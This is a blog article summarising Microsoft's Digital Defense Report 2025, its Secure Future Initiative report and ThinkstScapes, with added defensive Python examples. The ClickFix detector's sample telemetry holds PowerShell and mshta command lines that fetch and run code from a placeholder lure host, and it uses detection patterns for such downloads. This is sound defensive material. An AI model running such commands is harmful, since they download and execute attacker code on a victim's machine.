Refining Your Cybersecurity Strategy Based on Data

Learning about cybersecurity risks and mitigations is an endless rabbit hole. Along the way, many companies publish reports, filled with statistics and findings, guiding you towards a particular view of the preferred solution, often the ones the company happens to be selling.

But the lack of reliable ground truth for cybersecurity risks is a challenge for anyone attempting to figure out where to put their limited budget (or, in my case, attempting to convince my clients to shell out for various services). Vendors often do have large, useful datasets, but the data needs to be understood in context. If you're an email security vendor, your logs will be skewed towards email attacks, and thus your "view of the world" will be biased. Another example is "the average cost of a data breach" being reported by IBM as $4.4 million USD for 2025, $4.88 million USD for 2024 and so forth. Really? Maybe for the 1-2% of businesses classified as enterprises, but for every one of my clients, and for the 98% of businesses worldwide with fewer than 1,000 staff, that kind of cost would be completely business ending, and it mostly isn't, so I suspect the average for SMBs is a lot less.

In this article I'll look at Microsoft's recently released annual Digital Defense Report (DDR) 2025, their quarterly Secure Future Initiative (SFI) progress report from November, Thinkst's ThinkstScapes for Q3 and weave in a few other data points along the way. I'll also extract the salient points that you can apply to your own organization's cybersecurity approach. Microsoft's report is unique in that they cover every area in their services and security products and ingest data from both the commercial world (Azure, Microsoft 365, Dynamics 365 etc.) and the consumer risk landscape (Xbox, Bing etc.).

100 Trillion Signals a Day
The DDR is the evolution of the older annual Security Intelligence Report (SIR) so Microsoft has been at this for quite a few years. With contributions from 23 teams and 200 people over the last 12 months, the DDR is nevertheless quite easy to digest at 78 pages (plus a very handy glossary at the end). It's divided into two main sections, the first outlining the threat landscape, and the second the defense landscape.

And yes, Microsoft is claiming 100 trillion security signals processed daily, 4.5 million net new malware files blocked every day, and 5 billion emails screened daily. These are just nebulous numbers that are impossible for me to wrap my head around, but very few other organizations have such a comprehensive view of the cyber risk landscape on the internet (maybe AWS, Google and Cloudflare come to mind, but they don't offer services across every area).

The U.S. is the "leader" for Microsoft's customers being targeted at 24.8%, with the U.K. in second place at 5.6%, and Australia sharing 10th place with Taiwan at 1.8%. As for the industry vertical most in the crosshairs, that's Government agencies & services (17%), IT (also 17%) and Research and academia (11%).

The motivation of the attackers, based on reporting from Microsoft's Incident Response team, is interesting:

Motivations in IR Engagements (source: Microsoft DDR 2025).

Note that ransomware is only 1/5th, with data theft and extortion much more likely. Again, read these statistics based on the source, in this case Microsoft's Incident Response team, which only large organizations will be able to afford when they have a breach. Espionage at only 4% makes sense, but again you need to adapt this kind of figure to your organization's vertical: if you're a defense contractor that figure will be much higher, and if you're in retail it's close to 0%. I found infrastructure building intriguing; it's where the attackers take advantage of unmanaged assets to stage attacks against other third-party targets. This saves attackers the cloud bill for running the attack in the first place and also muddles attribution attempts (and is also why the idea of "hacking back" can be so dangerous -- making sure you're actually attacking the bad guy, and not another victim's infrastructure, isn't straightforward).

The initial access vector can be exploiting a public-facing application (11%), valid accounts (11%) or social engineering (10%, up from 8% in 2024). Where AI-automated phishing emails are used they achieve a 54% click-through rate (compared to 12% for standard attempts), but they're equally likely to get blocked by the email hygiene solution.

Another observation that Microsoft isn't alone in making is the rapid weaponization of exploits, where the time window between vulnerability disclosure, patch availability and patch deployment used to be measured in weeks and can now be days or even hours. Having the processes in place to triage high impact vulnerabilities, identify affected systems and rapidly roll out patches is challenging, but necessary.

One type of initial access that's risen in popularity over the last year is ClickFix, where an attacker plants a "fake captcha" and lures victims to the page (often with SEO poisoning -- buying ad space for related search terms, in essence relying on Google search being the vector to distribute the attack). There the victim is asked to press Win + R to open the Run dialog box and hit Enter to prove they're human, which runs the attacker's code. You should definitely include awareness of this attack type in your regular user training.
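Awareness training is one half of the answer to ClickFix; the other is a detection for the telemetry it leaves behind. Anything typed into the Run dialog is spawned by the Windows shell, so a script host whose parent is explorer.exe and whose arguments hide the window, carry an encoded command or fetch something remote is worth a look. The following is an added example, not code from the article or from Microsoft; the process-creation records are constructed for the example and only loosely mimic an EDR log, and the host names, user names and `lure.example` URLs are placeholders.

```python
"""Flag process-creation events that match the ClickFix shape: a script host
launched from explorer.exe (the parent of anything run from the Run dialog)
with arguments that an interactive user rarely types by hand."""

import re
from dataclasses import dataclass

# Script hosts and built-in download tools a Run-dialog lure can start directly.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe",
}

# Argument patterns that, combined with an explorer.exe parent, are suspicious:
# hidden windows, base64-encoded commands, and remote fetches.
SUSPICIOUS_ARGS = [
    re.compile(r"-(?:w|window(?:style)?)\s+hidden", re.I),
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|bitsadmin)\b", re.I),
    re.compile(r"https?://", re.I),
]


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """True when a script host is started by explorer.exe with suspicious arguments."""
    if _basename(ev.parent_image) != "explorer.exe":
        return False
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return False
    return any(p.search(ev.command_line) for p in SUSPICIOUS_ARGS)


def find_clickfix_candidates(events):
    return [ev for ev in events if is_clickfix_like(ev)]


def flagged_hosts(events):
    """Sorted list of hosts with at least one ClickFix-like event."""
    return sorted({ev.host for ev in find_clickfix_candidates(events)})


# Constructed sample telemetry: two benign shell launches, two ClickFix-style
# launches, and one hidden-window script that is benign because its parent is
# cmd.exe (a scheduled task), not the interactive shell.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "alice", r"C:\Windows\explorer.exe", PS, "powershell.exe"),
    ProcessEvent("WS01", "alice", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt"),
    ProcessEvent("WS02", "bob", r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "irm https://lure.example/verify | iex"'),
    ProcessEvent("WS03", "carol", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe", "mshta https://lure.example/captcha.hta"),
    ProcessEvent("SRV01", "svc_backup", r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell -w hidden -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"[ClickFix?] {ev.host} {ev.user}: {ev.command_line}")
```

The parent-process condition is what keeps the noise down: hidden-window PowerShell is routine under task schedulers and management agents, but rare directly beneath explorer.exe. In a real deployment the same logic maps onto an EDR hunting query over process-creation events, and the Run dialog's own history (the per-user RunMRU registry key) gives a second artifact to corroborate a hit during triage.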

Overall, the saying that "attackers don't break in, they log in" is true, but they still break in as well, so you've got to protect against both. The rise of infostealers is also called out, which is malware that runs on a user's (personal?) devices and scrapes usernames and passwords, along with cryptocurrency secrets. The most popular infostealer was Lumma Stealer (51%), which was taken down by Microsoft and others in May 2025.

As for emerging threats it's no surprise that attackers will use AI-enhanced social engineering and attacks but the biggest takeaway for me is the expansion of supply chain compromises. Getting access to dozens of clients by compromising a single Managed Service Provider, or thousands of endpoints by subverting a single application package is a fruitful path for attackers to take. If one of your suppliers were compromised -- could you detect the subsequent infiltration into your systems? What's your business risk management plan for it?

Cloud identities are targeted, including through malicious OAuth apps, highlighting the need for app governance. Putting the spotlight on identity attacks (and where you should focus your limited budget) is the fact that more than 97% of them are password spray or brute force attacks. That small leftover slice of 3% is made up of:

Emerging Identity Attacks (source: Microsoft DDR 2025).

In other words, attackers are bypassing MFA 10 times as frequently by stealing the token from users via malware on their devices (personal BYOD devices if you allow them) than they are through setting up fake login pages and tricking users into handing over their credentials. You should still move to phishing-resistant authentication (as that journey will take years), particularly now that Entra ID supports synced passkeys through any password manager, not just Microsoft Authenticator.

In the first half of 2025, identity-based attacks rose by 32% which is a sobering statistic, reinforcing the need to build your cybersecurity strategy on strong identity authentication. This is particularly true if you're in research and academia which are overrepresented in the data:

Organizations with Identity Compromise Signals by Sector (source: Microsoft DDR 2025).

The specialization in the cyber crime ecosystem is highlighted by the importance of access brokers, who provide that initial compromise, but then sell that to other criminals who perform the actual attacks.

Another fascinating statistic is that out of the 50,000 Autonomous System Numbers (ASNs) that carry authentication traffic, only 20 (0.04%) are the source of 80% of password spray activity. They'd be a good indicator that you could block.
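The two statistics above (97% of identity attacks being spray or brute force, and a handful of ASNs producing most of the spray) suggest a cheap first analysis of your own sign-in logs: group failures by source ASN, separate "many accounts, few attempts each" (spray) from "one account, many attempts" (brute force), and measure how concentrated the failures are. This is an added example, not code from the article or from Microsoft; the sign-in records are constructed with a deliberately simplified schema (real Entra ID sign-in logs carry many more fields), the ASNs are from the documentation range reserved by RFC 5398, and the thresholds are assumptions to tune against your own baseline.

```python
"""Classify failed sign-ins per source ASN as password spray, brute force or
benign noise, and report how much of the failure volume the noisiest ASNs carry."""

from collections import defaultdict
from dataclasses import dataclass


@dataclass
class SignIn:
    upn: str        # user principal name
    asn: int        # autonomous system the source IP belongs to
    success: bool   # whether authentication succeeded


# Assumed thresholds; tune to your tenant's normal failure rate.
SPRAY_MIN_USERS = 5        # at least this many distinct accounts from one ASN...
SPRAY_MAX_PER_USER = 3.0   # ...with only a few failures per account
BRUTE_MIN_PER_USER = 10.0  # a small set of accounts hammered repeatedly


def _failed_by_asn(events):
    """Per-ASN failure count and set of targeted accounts."""
    stats = defaultdict(lambda: {"attempts": 0, "users": set()})
    for ev in events:
        if ev.success:
            continue
        stats[ev.asn]["attempts"] += 1
        stats[ev.asn]["users"].add(ev.upn)
    return stats


def classify_asns(events):
    """Return {asn: 'spray' | 'brute_force' | 'benign'} for every ASN with failures."""
    verdicts = {}
    for asn, s in _failed_by_asn(events).items():
        per_user = s["attempts"] / len(s["users"])
        if len(s["users"]) >= SPRAY_MIN_USERS and per_user <= SPRAY_MAX_PER_USER:
            verdicts[asn] = "spray"
        elif per_user >= BRUTE_MIN_PER_USER:
            verdicts[asn] = "brute_force"
        else:
            verdicts[asn] = "benign"
    return verdicts


def asns_to_review(events):
    """ASNs worth a block or a Conditional Access named-location rule."""
    return sorted(asn for asn, v in classify_asns(events).items() if v != "benign")


def top_asn_share(events, k):
    """Fraction of all failed sign-ins produced by the k noisiest ASNs."""
    stats = _failed_by_asn(events)
    total = sum(s["attempts"] for s in stats.values())
    if total == 0:
        return 0.0
    top = sorted((s["attempts"] for s in stats.values()), reverse=True)[:k]
    return sum(top) / total


def _build_sample():
    """Constructed log: one spraying ASN, one brute-forcing ASN, two ordinary ones."""
    events = []
    for i in range(20):                     # AS64496: 20 accounts x 2 failures = spray
        events += [SignIn(f"user{i}@contoso.example", 64496, False)] * 2
    events += [SignIn("cfo@contoso.example", 64497, False)] * 30   # AS64497: brute force
    for i in range(10):                     # AS64498: the office, mostly successes
        events.append(SignIn(f"user{i}@contoso.example", 64498, True))
    events.append(SignIn("user3@contoso.example", 64498, False))   # two typos
    events.append(SignIn("user7@contoso.example", 64498, False))
    events.append(SignIn("user1@contoso.example", 64499, False))   # AS64499: one stray failure
    return events


SAMPLE_EVENTS = _build_sample()

if __name__ == "__main__":
    for asn, verdict in sorted(classify_asns(SAMPLE_EVENTS).items()):
        print(f"AS{asn}: {verdict}")
    print(f"top 2 ASNs carry {top_asn_share(SAMPLE_EVENTS, 2):.0%} of failures")
```

On the constructed data the top two ASNs carry 96% of failures, which is the shape the DDR describes at internet scale. Before blocking an ASN, check its distinct-user ratio and success rate: a large consumer ISP's ASN carries plenty of legitimate sign-ins, so the distinct-user and per-user thresholds matter more than raw volume.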

Coming back to business size, the number of organizations in different revenue brackets that were hit by ransomware is fascinating, with smaller ones much more numerous:

Ransomed Organizations by Revenue (source: Microsoft DDR 2025).

Attackers are getting more cloud savvy: today 40% of ransomware attacks involve hybrid environments, whereas two years ago less than 5% did. While EDR is highly effective in limiting these attacks, in over 82% of cases the attackers also exfiltrate data to increase the pressure on the victim to pay. They also move faster than in the past; most attacks (59%) have a dwell time of seven days or less.

Business email compromise (BEC) is a more frequent outcome in attacks (21%) compared to ransomware (16%).

Rounding off the attack landscape is insider risk, something that most cybersecurity frameworks don't take into account. On average it takes 81 days to contain an insider incident. Don't forget about the North Korean IT worker risk, something that's spreading far beyond just large tech companies.

AI-Powered Defense?
On the opposite side, there are 10 key points in cyber defense mentioned:

  1. Cyber risk is business risk
  2. AI-powered defense is essential
  3. AI agents can help in threat mitigation and incident response
  4. Organizations should implement a security framework for AI use
  5. Deterring cyberattacks requires political solutions
  6. Cooperation across borders is crucial to mitigate cyber risks
  7. Resilience must be woven in by design
  8. Public-private collaboration is key to disrupting cybercrime ecosystems
  9. Governments are moving away from voluntary compliance toward cyber requirements
  10. Organizations must prepare for quantum computing

I couldn't agree more with No. 1, although we in the cybersecurity space must get better at quantifying that business risk. As for 2 and 3, this might be true, but it's suspect advice (given that Microsoft's big push is Security Copilot) and also unfeasible for smaller businesses (given that Security Copilot is too expensive for SMBs). There was a recent announcement at Ignite that Security Copilot Secure Compute Units (SCUs) will be included at a rate of the number of M365 E5 licenses divided by 2.5, so a 1,000 user company will have 400 SCUs per month to work with, but an SMB with 15 users won't get much mileage out of six SCUs. Point 4 also makes sense, but it's hard to govern AI usage in a business because it moves so fast. Five and six are great ideas, but not something most businesses can influence much.

Cyber resilience and building a security culture are possibly among the hardest nuts to crack, but arguably the most important. If your organization is big enough, collaboration with others, including the public sector, is important. And the fact that more government regulation is being used to manage cyber risk isn't in doubt, given that relying "on the market" to handle the risk clearly isn't working. Upcoming quantum computing that'll break encryption is also something you need to take seriously.

Thinkstscapes
Thinkst makes a fantastic on-premises early warning system for intrusions in the form of honeypot appliances. They also offer free, software-based Canarytokens in over 30 flavors, well worth a quick setup to give you a strong signal that someone who shouldn't be there is in your infrastructure.

They also provide a free, quarterly report that sifts through security blog posts and talks to extract research that deserves attention. The latest report has sifted through 1,551 papers / talks to focus on 19 of them. One of them is "One Token to rule them all -- obtaining Global Admin in every Entra ID tenant via Actor tokens" where Dirk-jan Mollema, a well-known Entra ID researcher, found undocumented actor tokens used to synchronize hybrid Exchange / SharePoint environments to M365, which weren't properly validated. This attack made it possible for an adversary to create any account (including Global Admin) in any Entra ID tenant in the world. Fortunately, Dirk-jan is a good guy and he reported this to Microsoft responsibly and they fixed it.

Another research avenue (by a group of authors) is that modern, high precision optical mice can be used to capture audio spoken next to them, to steal passwords or PIN codes spoken aloud.

The final one I'll mention is the problem with internal Active Directory domain names, where Top Level Domains (TLDs) that didn't exist decades ago are now available. It started with "company.llc", which was registered in a red-team exercise, where they started capturing NTLM hashes that were sent over the internet to the red-team's server. Further, the ".ad" TLD was often used back in the day, but it is the country of Andorra's TLD, and the researcher also registered the domain "internal.ad". The takeaway is that if you're using an ".ad" domain internally in Active Directory, register that domain name so malicious actors can't use it against you.
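The practical check that follows from this research is an inventory question: for each DNS name your forests and internal services use, is the TLD one anybody can register under, one ICANN has withheld, or one reserved for private use? The following is an added example, not code from the article or from Thinkst; the TLD sets are a small constructed subset (a real audit should be driven by the IANA root zone list at https://data.iana.org/TLD/tlds-alpha-by-domain.txt and the public suffix list), the sample domain names are made up, and `registrable_name` uses the simplification that the registrable part is the last two labels, which is wrong for multi-label public suffixes such as co.uk.

```python
"""Audit internal AD / DNS names for TLDs that have since become publicly
registrable, so the matching public name can be registered defensively."""

# Constructed subset of publicly delegated TLDs, including strings that collide
# with old internal naming habits (.ad is Andorra's ccTLD, .llc/.inc/.ltd are
# generic TLDs delegated in recent years).
DELEGATED_TLDS = {"com", "net", "org", "ad", "llc", "inc", "ltd", "dev", "app", "zip"}

# Reserved for private/special use and not registrable: .local (RFC 6762),
# .test/.example/.invalid/.localhost (RFC 2606/6761), .internal (ICANN, 2024).
RESERVED_TLDS = {"local", "internal", "test", "example", "invalid", "localhost"}

# Strings ICANN has withheld from delegation as high-risk name-collision TLDs.
WITHHELD_TLDS = {"corp", "home", "mail"}


def tld_of(name: str) -> str:
    return name.strip(".").rsplit(".", 1)[-1].lower()


def registrable_name(name: str) -> str:
    """Last two labels, e.g. 'ad.contoso.com' -> 'contoso.com' (simplified)."""
    labels = name.strip(".").lower().split(".")
    return ".".join(labels[-2:])


def classify_domain(name: str) -> str:
    """'public', 'reserved', 'withheld' or 'unknown' for the name's TLD."""
    tld = tld_of(name)
    if tld in RESERVED_TLDS:
        return "reserved"
    if tld in WITHHELD_TLDS:
        return "withheld"
    if tld in DELEGATED_TLDS:
        return "public"
    return "unknown"


def audit(domains):
    """Return (domain, verdict, recommended action) for each internal name."""
    report = []
    for d in domains:
        verdict = classify_domain(d)
        if verdict == "public":
            action = f"register {registrable_name(d)} yourself, or confirm your organisation already holds it"
        elif verdict == "withheld":
            action = "not registrable today; keep internal resolvers authoritative for it"
        elif verdict == "reserved":
            action = "OK: reserved TLD, cannot be registered publicly"
        else:
            action = f"check .{tld_of(d)} against the IANA root zone list"
        report.append((d, verdict, action))
    return report


# Constructed inventory of internal names from a fictional organisation.
SAMPLE_DOMAINS = [
    "corp.contoso.local",
    "internal.ad",
    "company.llc",
    "hq.corp",
    "ad.contoso.com",
    "lab.internal",
    "office.lan",
]

if __name__ == "__main__":
    for domain, verdict, action in audit(SAMPLE_DOMAINS):
        print(f"{domain:22} {verdict:9} {action}")
```

A "public" verdict is not automatically a problem: ad.contoso.com is fine as long as you own contoso.com. The names to act on are those where the registrable part is not yours, which is exactly the internal.ad and company.llc cases in the research.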

Secure Future Initiative -- Covering It All?
Microsoft has now been at their Secure Future Initiative for two years, providing quarterly progress reports, and recommendations that other companies can adapt in securing their own infrastructure. The most recent report from November 2025 looks at their progress across six engineering pillars:

  • Protect identities and secrets
  • Protect tenants and isolate production systems
  • Protect networks
  • Protect engineering systems
  • Monitor and detect threats
  • Accelerate response and remediation

Highlights that affect us as users of Microsoft's services are the expansion of Azure mandatory MFA to Azure Bastion (a way to connect to VMs in the cloud securely), and the introduction of MFA for command-line interfaces (PowerShell and CLI). Microsoft Purview manages and monitors AI data security across Copilots, agents and apps (including third-party LLMs).

Security Principles and Engineering Pillars of SFI (source: Microsoft).

Internally Microsoft has 99.6% (!) adoption rate for phishing-resistant MFA across their user base, and 44,500 higher risk users use Azure Virtual Desktops to reduce device compromise risk. They've also deployed over 50 new detections in their own infrastructure and generally applicable ones will be implemented in Microsoft Defender as well. And they've retired Active Directory Federation Services (ADFS) usage internally, which to me signals for any enterprise still using ADFS -- it's time to let it go.

If you need on-premises virtualization infrastructure (perhaps to replace those VMware clusters that are sucking up all your IT budget in licensing fee increases), Azure Local (formerly Azure Stack HCI) has adopted another 400 default security settings. If you've got infrastructure in Azure public cloud, every new server in Azure is fitted with a Hardware Security Module that's FIPS 140-3 level 3 compliant, providing hardware enforced trust for Azure Storage and Azure Key Vault.

The report is overall positive about their progress, and it's very impressive given the size and complexity of Microsoft, but I do have to ask, given the mantra is "Security above all else", why no one in the M365 engineering team put up their hand and said "these Actor tokens that we rely on in hybrid infrastructure -- could they be used maliciously?" before Dirk-jan found them as an external researcher? Maybe someone did but it wasn't taken seriously? Seems like there are still "bodies buried" in places that Microsoft hasn't found yet.

Conclusion
Building your cybersecurity strategy on actionable data is crucial and keeping up with the changing threat landscape is hard. With thousands of cybersecurity reports being released every month, hopefully the salient points from these three important ones will help you in this quest.
